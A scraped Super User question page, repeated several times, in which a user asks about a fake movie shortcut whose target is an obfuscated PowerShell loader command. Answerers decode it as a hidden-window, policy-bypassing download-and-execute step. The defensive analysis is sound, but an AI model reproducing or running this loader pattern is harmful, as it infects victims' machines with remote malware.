What does specifically this link do or is it a virus? [duplicate]










6















This question already has an answer here:



  • How can I remove malicious spyware, malware, adware, viruses, trojans or rootkits from my PC?

    20 answers



In Windows 10 I downloaded this file that I thought was a movie but it was a short-cut with a size of 700MB



I see that the target is this




C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -NoPr -WINd
1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141,
163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 ,
152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116




And it was set to start at




%SYSTEMROOT%System32WindowsPowerShellv1.0




What does it do?










share|improve this question















marked as duplicate by Twisty Impersonator, slhck, Ramhound, DavidPostill windows-10
Users with the  windows-10 badge can single-handedly close windows-10 questions as duplicates and reopen them as needed.

StackExchange.ready(function()
if (StackExchange.options.isMobile) return;

$('.dupe-hammer-message-hover:not(.hover-bound)').each(function()
var $hover = $(this).addClass('hover-bound'),
$msg = $hover.siblings('.dupe-hammer-message');

$hover.hover(
function()
$hover.showInfoMessage('',
messageElement: $msg.clone().show(),
transient: false,
position: my: 'bottom left', at: 'top center', offsetTop: -7 ,
dismissable: false,
relativeToBody: true
);
,
function()
StackExchange.helpers.removeMessages();

);
);
);
Nov 12 '18 at 21:53


This question has been asked before and already has an answer. If those answers do not fully address your question, please ask a new question.










  • 1




    -nopr, -wind & byp are all pretty scary...The numbers are forming a bit-shifted URL but I don't have the knowledge to work out what it's trying to get to.
    – spikey_richie
    Nov 12 '18 at 14:35











  • thanks, I actually pressed the link, the Powershell briefly poped up thats all, so far
    – Erik
    Nov 12 '18 at 14:38







  • 7




    It is obviously some sort of malware. The digits are octal numbers which translate into $aspx = ((New-Object System.N, but it would need a lot more of these to be able to work out what it is intended to do. If it has installed a Trojan, such as a key logger, then you won't be aware of its presence. Disconnect from the internet, restart (not reboot) and run a full virus scan (including root-kit scan). Depending on its nature it could have infected other systems in your network.
    – AFH
    Nov 12 '18 at 14:45











  • I have McaFee liveSafe premium but it did not react
    – Erik
    Nov 12 '18 at 14:47






  • 1




    Some similar obfuscated code is documented here.
    – AFH
    Nov 12 '18 at 14:59
















6















This question already has an answer here:



  • How can I remove malicious spyware, malware, adware, viruses, trojans or rootkits from my PC?

    20 answers



In Windows 10 I downloaded this file that I thought was a movie but it was a short-cut with a size of 700MB



I see that the target is this




C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -NoPr -WINd
1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141,
163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 ,
152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116




And it was set to start at




%SYSTEMROOT%System32WindowsPowerShellv1.0




What does it do?










share|improve this question















marked as duplicate by Twisty Impersonator, slhck, Ramhound, DavidPostill windows-10
Users with the  windows-10 badge can single-handedly close windows-10 questions as duplicates and reopen them as needed.

StackExchange.ready(function()
if (StackExchange.options.isMobile) return;

$('.dupe-hammer-message-hover:not(.hover-bound)').each(function()
var $hover = $(this).addClass('hover-bound'),
$msg = $hover.siblings('.dupe-hammer-message');

$hover.hover(
function()
$hover.showInfoMessage('',
messageElement: $msg.clone().show(),
transient: false,
position: my: 'bottom left', at: 'top center', offsetTop: -7 ,
dismissable: false,
relativeToBody: true
);
,
function()
StackExchange.helpers.removeMessages();

);
);
);
Nov 12 '18 at 21:53


This question has been asked before and already has an answer. If those answers do not fully address your question, please ask a new question.










  • 1




    -nopr, -wind & byp are all pretty scary...The numbers are forming a bit-shifted URL but I don't have the knowledge to work out what it's trying to get to.
    – spikey_richie
    Nov 12 '18 at 14:35











  • thanks, I actually pressed the link, the Powershell briefly poped up thats all, so far
    – Erik
    Nov 12 '18 at 14:38







  • 7




    It is obviously some sort of malware. The digits are octal numbers which translate into $aspx = ((New-Object System.N, but it would need a lot more of these to be able to work out what it is intended to do. If it has installed a Trojan, such as a key logger, then you won't be aware of its presence. Disconnect from the internet, restart (not reboot) and run a full virus scan (including root-kit scan). Depending on its nature it could have infected other systems in your network.
    – AFH
    Nov 12 '18 at 14:45











  • I have McaFee liveSafe premium but it did not react
    – Erik
    Nov 12 '18 at 14:47






  • 1




    Some similar obfuscated code is documented here.
    – AFH
    Nov 12 '18 at 14:59














6












6








6








This question already has an answer here:



  • How can I remove malicious spyware, malware, adware, viruses, trojans or rootkits from my PC?

    20 answers



In Windows 10 I downloaded this file that I thought was a movie but it was a short-cut with a size of 700MB



I see that the target is this




C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -NoPr -WINd
1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141,
163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 ,
152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116




And it was set to start at




%SYSTEMROOT%System32WindowsPowerShellv1.0




What does it do?










share|improve this question
















This question already has an answer here:



  • How can I remove malicious spyware, malware, adware, viruses, trojans or rootkits from my PC?

    20 answers



In Windows 10 I downloaded this file that I thought was a movie but it was a short-cut with a size of 700MB



I see that the target is this




C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -NoPr -WINd
1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141,
163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 ,
152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116




And it was set to start at




%SYSTEMROOT%System32WindowsPowerShellv1.0




What does it do?





This question already has an answer here:



  • How can I remove malicious spyware, malware, adware, viruses, trojans or rootkits from my PC?

    20 answers







windows-10 virus shortcuts






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Nov 12 '18 at 19:26

























asked Nov 12 '18 at 14:13









Erik

1314




1314




marked as duplicate by Twisty Impersonator, slhck, Ramhound, DavidPostill windows-10
Users with the  windows-10 badge can single-handedly close windows-10 questions as duplicates and reopen them as needed.

StackExchange.ready(function()
if (StackExchange.options.isMobile) return;

$('.dupe-hammer-message-hover:not(.hover-bound)').each(function()
var $hover = $(this).addClass('hover-bound'),
$msg = $hover.siblings('.dupe-hammer-message');

$hover.hover(
function()
$hover.showInfoMessage('',
messageElement: $msg.clone().show(),
transient: false,
position: my: 'bottom left', at: 'top center', offsetTop: -7 ,
dismissable: false,
relativeToBody: true
);
,
function()
StackExchange.helpers.removeMessages();

);
);
);
Nov 12 '18 at 21:53


This question has been asked before and already has an answer. If those answers do not fully address your question, please ask a new question.






marked as duplicate by Twisty Impersonator, slhck, Ramhound, DavidPostill windows-10
Users with the  windows-10 badge can single-handedly close windows-10 questions as duplicates and reopen them as needed.

StackExchange.ready(function()
if (StackExchange.options.isMobile) return;

$('.dupe-hammer-message-hover:not(.hover-bound)').each(function()
var $hover = $(this).addClass('hover-bound'),
$msg = $hover.siblings('.dupe-hammer-message');

$hover.hover(
function()
$hover.showInfoMessage('',
messageElement: $msg.clone().show(),
transient: false,
position: my: 'bottom left', at: 'top center', offsetTop: -7 ,
dismissable: false,
relativeToBody: true
);
,
function()
StackExchange.helpers.removeMessages();

);
);
);
Nov 12 '18 at 21:53


This question has been asked before and already has an answer. If those answers do not fully address your question, please ask a new question.









  • 1




    -nopr, -wind & byp are all pretty scary...The numbers are forming a bit-shifted URL but I don't have the knowledge to work out what it's trying to get to.
    – spikey_richie
    Nov 12 '18 at 14:35











  • thanks, I actually pressed the link, the Powershell briefly poped up thats all, so far
    – Erik
    Nov 12 '18 at 14:38







  • 7




    It is obviously some sort of malware. The digits are octal numbers which translate into $aspx = ((New-Object System.N, but it would need a lot more of these to be able to work out what it is intended to do. If it has installed a Trojan, such as a key logger, then you won't be aware of its presence. Disconnect from the internet, restart (not reboot) and run a full virus scan (including root-kit scan). Depending on its nature it could have infected other systems in your network.
    – AFH
    Nov 12 '18 at 14:45











  • I have McaFee liveSafe premium but it did not react
    – Erik
    Nov 12 '18 at 14:47






  • 1




    Some similar obfuscated code is documented here.
    – AFH
    Nov 12 '18 at 14:59













  • 1




    -nopr, -wind & byp are all pretty scary...The numbers are forming a bit-shifted URL but I don't have the knowledge to work out what it's trying to get to.
    – spikey_richie
    Nov 12 '18 at 14:35











  • thanks, I actually pressed the link, the Powershell briefly poped up thats all, so far
    – Erik
    Nov 12 '18 at 14:38







  • 7




    It is obviously some sort of malware. The digits are octal numbers which translate into $aspx = ((New-Object System.N, but it would need a lot more of these to be able to work out what it is intended to do. If it has installed a Trojan, such as a key logger, then you won't be aware of its presence. Disconnect from the internet, restart (not reboot) and run a full virus scan (including root-kit scan). Depending on its nature it could have infected other systems in your network.
    – AFH
    Nov 12 '18 at 14:45











  • I have McaFee liveSafe premium but it did not react
    – Erik
    Nov 12 '18 at 14:47






  • 1




    Some similar obfuscated code is documented here.
    – AFH
    Nov 12 '18 at 14:59








1




1




-nopr, -wind & byp are all pretty scary...The numbers are forming a bit-shifted URL but I don't have the knowledge to work out what it's trying to get to.
– spikey_richie
Nov 12 '18 at 14:35





-nopr, -wind & byp are all pretty scary...The numbers are forming a bit-shifted URL but I don't have the knowledge to work out what it's trying to get to.
– spikey_richie
Nov 12 '18 at 14:35













thanks, I actually pressed the link, the Powershell briefly poped up thats all, so far
– Erik
Nov 12 '18 at 14:38





thanks, I actually pressed the link, the Powershell briefly poped up thats all, so far
– Erik
Nov 12 '18 at 14:38





7




7




It is obviously some sort of malware. The digits are octal numbers which translate into $aspx = ((New-Object System.N, but it would need a lot more of these to be able to work out what it is intended to do. If it has installed a Trojan, such as a key logger, then you won't be aware of its presence. Disconnect from the internet, restart (not reboot) and run a full virus scan (including root-kit scan). Depending on its nature it could have infected other systems in your network.
– AFH
Nov 12 '18 at 14:45





It is obviously some sort of malware. The digits are octal numbers which translate into $aspx = ((New-Object System.N, but it would need a lot more of these to be able to work out what it is intended to do. If it has installed a Trojan, such as a key logger, then you won't be aware of its presence. Disconnect from the internet, restart (not reboot) and run a full virus scan (including root-kit scan). Depending on its nature it could have infected other systems in your network.
– AFH
Nov 12 '18 at 14:45













I have McaFee liveSafe premium but it did not react
– Erik
Nov 12 '18 at 14:47




I have McaFee liveSafe premium but it did not react
– Erik
Nov 12 '18 at 14:47




1




1




Some similar obfuscated code is documented here.
– AFH
Nov 12 '18 at 14:59





Some similar obfuscated code is documented here.
– AFH
Nov 12 '18 at 14:59











1 Answer
1






active

oldest

votes


















9














It's a malware loader.



It executes a powershell code beginning with New-Object System.N... (hidden in the numbers), which in full content is New-Object System.Net.WebClient, that will further be used to download and execute the actual malware from the URL that is also hidden in the further numbers of the obfuscated code.



If you have already clicked the link, then you're likely already infected, unless the URL was already taken down.



You may try to paste your line to notepad and then delete everything before ( -JoiN( (, copy the remaining part (beginning with ( -JoiN( (...) and paste it to PowerShell window. It will disclose the obfuscated PowerShell code that would normally be executed by the preceding $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression.






share|improve this answer




















  • thanks, I got this code: 441411631601704075405050116145167551171421521451431644012317116316414515556116 How can i make out something from this code?
    – Erik
    Nov 12 '18 at 18:25







  • 1




    There are probably additional parts of the code (such as the actual URL) hiding in the shortcut file that are appended to the command when the shortcut is run.
    – trognanders
    Nov 12 '18 at 20:51










  • Please pass the complete code, incl. commas.
    – Michał Sacharewicz
    Nov 13 '18 at 10:05










  • that is the code I got following your instructions, 441411631601704075405050116.....
    – Erik
    Nov 14 '18 at 8:48










  • You're missing something. Please paste whole shortcut code.
    – Michał Sacharewicz
    Nov 15 '18 at 18:13

















1 Answer
1






active

oldest

votes








1 Answer
1






active

oldest

votes









active

oldest

votes






active

oldest

votes









9














It's a malware loader.



It executes a powershell code beginning with New-Object System.N... (hidden in the numbers), which in full content is New-Object System.Net.WebClient, that will further be used to download and execute the actual malware from the URL that is also hidden in the further numbers of the obfuscated code.



If you have already clicked the link, then you're likely already infected, unless the URL was already taken down.



You may try to paste your line to notepad and then delete everything before ( -JoiN( (, copy the remaining part (beginning with ( -JoiN( (...) and paste it to PowerShell window. It will disclose the obfuscated PowerShell code that would normally be executed by the preceding $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression.






share|improve this answer




















  • thanks, I got this code: 441411631601704075405050116145167551171421521451431644012317116316414515556116 How can i make out something from this code?
    – Erik
    Nov 12 '18 at 18:25







  • 1




    There are probably additional parts of the code (such as the actual URL) hiding in the shortcut file that are appended to the command when the shortcut is run.
    – trognanders
    Nov 12 '18 at 20:51










  • Please pass the complete code, incl. commas.
    – Michał Sacharewicz
    Nov 13 '18 at 10:05










  • that is the code I got following your instructions, 441411631601704075405050116.....
    – Erik
    Nov 14 '18 at 8:48










  • You're missing something. Please paste whole shortcut code.
    – Michał Sacharewicz
    Nov 15 '18 at 18:13















9














It's a malware loader.



It executes a powershell code beginning with New-Object System.N... (hidden in the numbers), which in full content is New-Object System.Net.WebClient, that will further be used to download and execute the actual malware from the URL that is also hidden in the further numbers of the obfuscated code.



If you have already clicked the link, then you're likely already infected, unless the URL was already taken down.



You may try to paste your line to notepad and then delete everything before ( -JoiN( (, copy the remaining part (beginning with ( -JoiN( (...) and paste it to PowerShell window. It will disclose the obfuscated PowerShell code that would normally be executed by the preceding $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression.






share|improve this answer




















  • thanks, I got this code: 441411631601704075405050116145167551171421521451431644012317116316414515556116 How can i make out something from this code?
    – Erik
    Nov 12 '18 at 18:25







  • 1




    There are probably additional parts of the code (such as the actual URL) hiding in the shortcut file that are appended to the command when the shortcut is run.
    – trognanders
    Nov 12 '18 at 20:51










  • Please pass the complete code, incl. commas.
    – Michał Sacharewicz
    Nov 13 '18 at 10:05










  • that is the code I got following your instructions, 441411631601704075405050116.....
    – Erik
    Nov 14 '18 at 8:48










  • You're missing something. Please paste whole shortcut code.
    – Michał Sacharewicz
    Nov 15 '18 at 18:13













9












9








9






It's a malware loader.



It executes a powershell code beginning with New-Object System.N... (hidden in the numbers), which in full content is New-Object System.Net.WebClient, that will further be used to download and execute the actual malware from the URL that is also hidden in the further numbers of the obfuscated code.



If you have already clicked the link, then you're likely already infected, unless the URL was already taken down.



You may try to paste your line to notepad and then delete everything before ( -JoiN( (, copy the remaining part (beginning with ( -JoiN( (...) and paste it to PowerShell window. It will disclose the obfuscated PowerShell code that would normally be executed by the preceding $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression.






share|improve this answer












It's a malware loader.



It executes a powershell code beginning with New-Object System.N... (hidden in the numbers), which in full content is New-Object System.Net.WebClient, that will further be used to download and execute the actual malware from the URL that is also hidden in the further numbers of the obfuscated code.



If you have already clicked the link, then you're likely already infected, unless the URL was already taken down.



You may try to paste your line to notepad and then delete everything before ( -JoiN( (, copy the remaining part (beginning with ( -JoiN( (...) and paste it to PowerShell window. It will disclose the obfuscated PowerShell code that would normally be executed by the preceding $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression.







share|improve this answer












share|improve this answer



share|improve this answer










answered Nov 12 '18 at 16:53









Michał Sacharewicz

1,6451117




1,6451117











  • thanks, I got this code: 441411631601704075405050116145167551171421521451431644012317116316414515556116 How can i make out something from this code?
    – Erik
    Nov 12 '18 at 18:25







  • 1




    There are probably additional parts of the code (such as the actual URL) hiding in the shortcut file that are appended to the command when the shortcut is run.
    – trognanders
    Nov 12 '18 at 20:51










  • Please pass the complete code, incl. commas.
    – Michał Sacharewicz
    Nov 13 '18 at 10:05










  • that is the code I got following your instructions, 441411631601704075405050116.....
    – Erik
    Nov 14 '18 at 8:48










  • You're missing something. Please paste whole shortcut code.
    – Michał Sacharewicz
    Nov 15 '18 at 18:13
















  • thanks, I got this code: 441411631601704075405050116145167551171421521451431644012317116316414515556116 How can i make out something from this code?
    – Erik
    Nov 12 '18 at 18:25







  • 1




    There are probably additional parts of the code (such as the actual URL) hiding in the shortcut file that are appended to the command when the shortcut is run.
    – trognanders
    Nov 12 '18 at 20:51










  • Please pass the complete code, incl. commas.
    – Michał Sacharewicz
    Nov 13 '18 at 10:05










  • that is the code I got following your instructions, 441411631601704075405050116.....
    – Erik
    Nov 14 '18 at 8:48










  • You're missing something. Please paste whole shortcut code.
    – Michał Sacharewicz
    Nov 15 '18 at 18:13















thanks, I got this code: 441411631601704075405050116145167551171421521451431644012317116316414515556116 How can i make out something from this code?
– Erik
Nov 12 '18 at 18:25





thanks, I got this code: 441411631601704075405050116145167551171421521451431644012317116316414515556116 How can i make out something from this code?
– Erik
Nov 12 '18 at 18:25





1




1




There are probably additional parts of the code (such as the actual URL) hiding in the shortcut file that are appended to the command when the shortcut is run.
– trognanders
Nov 12 '18 at 20:51




There are probably additional parts of the code (such as the actual URL) hiding in the shortcut file that are appended to the command when the shortcut is run.
– trognanders
Nov 12 '18 at 20:51












Please pass the complete code, incl. commas.
– Michał Sacharewicz
Nov 13 '18 at 10:05




Please pass the complete code, incl. commas.
– Michał Sacharewicz
Nov 13 '18 at 10:05












that is the code I got following your instructions, 441411631601704075405050116.....
– Erik
Nov 14 '18 at 8:48




that is the code I got following your instructions, 441411631601704075405050116.....
– Erik
Nov 14 '18 at 8:48












You're missing something. Please paste whole shortcut code.
– Michał Sacharewicz
Nov 15 '18 at 18:13




You're missing something. Please paste whole shortcut code.
– Michał Sacharewicz
Nov 15 '18 at 18:13



這個網誌中的熱門文章

How to read a connectionString WITH PROVIDER in .NET Core?

In R, how to develop a multiplot heatmap.2 figure showing key labels successfully

Museum of Modern and Contemporary Art of Trento and Rovereto